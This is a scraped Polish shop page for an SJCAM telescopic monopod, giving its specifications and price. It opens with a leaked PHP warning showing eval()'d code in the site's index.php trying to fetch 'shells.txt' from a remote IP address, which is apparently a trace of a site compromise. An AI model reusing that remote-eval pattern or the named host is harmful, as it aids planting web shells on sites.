Warning: file_get_contents(http://103.114.107.133/shells.txt): failed to open stream: Connection refused in /usr/home/sjcam/domains/sjcam-poland.com/public_html/index.php(2) : eval()'d code on line 2 Ramię teleskopowe IHS SJCAM

Ramię teleskopowe IHS SJCAM

IHS

Nowe

długość: od 25 do 74 cm

udźwig: do 2kg

waga: 100 gram

Więcej szczegółów

Dostępny

43,90 zł

Wysyłka w ciągu 24 godzin

Gwarancja 24 miesiące

Bezpieczne zakupy

Monopod, ramię teleskopowe o długości maksymalnej 74 cm przeznaczony kamerom sportowym (SJCAM), aparatom i kamerom cyfrowym (do 2 kg) oraz telefonom komórkowym (o szerokości nie większej niż 90 mm).

Jest to ramię telekopowe, którego długość, blokowana i odblokowana jest za pomocą przekręcenia teleskopowego ramienia. Umożliwia nam to sprawną i bezproblemową zmianę długości na odpowiednią (od 25 do 74 cm). Pozwala on na oddalenie aparatu, kamery, telefonu na maksymalną odległość 74 cm.
Takie zastosowanie pozwoli na filmowanie / fotografowanie z dalszej perspektywy co umożliwia nam uzyskanie ciekawszych ujęć. Rewelacyjnie sprawdza się podczas filmowania w trakcie jazdy na nartach, snowboardzie, quadzie, rolkach itp.

Urządzenie posiada 4 teleskopowe elementy zaprojektowane z najwyższej jakości materiałów. Dzięki temu monopod jest sztywny i pozwala nam na nagrywanie bez niepotrzebnych drgań i poruszeń.

Zwarta konstrukcja pozwala nam także na nagrywanie lub wykonywanie zdjęć urządzeniem o masie do 2 kg. Dodatkowym atutem monopodu jest waga (100 gram), która pozwoli na długie, komfortowe i bezproblemowe użytkowanie.

Wysięgnik wyposażony został w wbudowane mocowanie do kamer SJCAM. Ponadto w zestawie znajduje się solidny adapter do telefonów czy tabletów (max. szerokość 90 mm). Ramię teleskopowe pozwala także na używanie wszystkich aparatów fotograficznych i kamer (do 2 kg) za pomocą gwinta statywowego 1/4". Przy takiej instalacji mamy możliwość regulowania kąta mocowania kamery czy aparatu.

Materiałaluminium, tworzywo sztuczne, pianka
Max. długość pracy74 cm
Min. długość pracy25 cm
Ilość sekcji4
Mocowaniedo telefonów, kamer SJCAM, aparatów i kamer fot.
Udźwig2 kg
Waga100 gram
KompatybilnośćDzięki uniwersalnemu gwintowi 1/4" Monopod IHS współpracuje z wszystkimi dostępnymi w tej chwili aparatami i kamerami m.in. Canon, Nikon, Sony, Pentax, Olympus, Fujifilm, Panasonic, JVC, Samsung i wieloma innymi.

Napisz opinię

Ramię teleskopowe IHS SJCAM

Ramię teleskopowe IHS SJCAM

długość: od 25 do 74 cm

udźwig: do 2kg

waga: 100 gram

Napisz opinię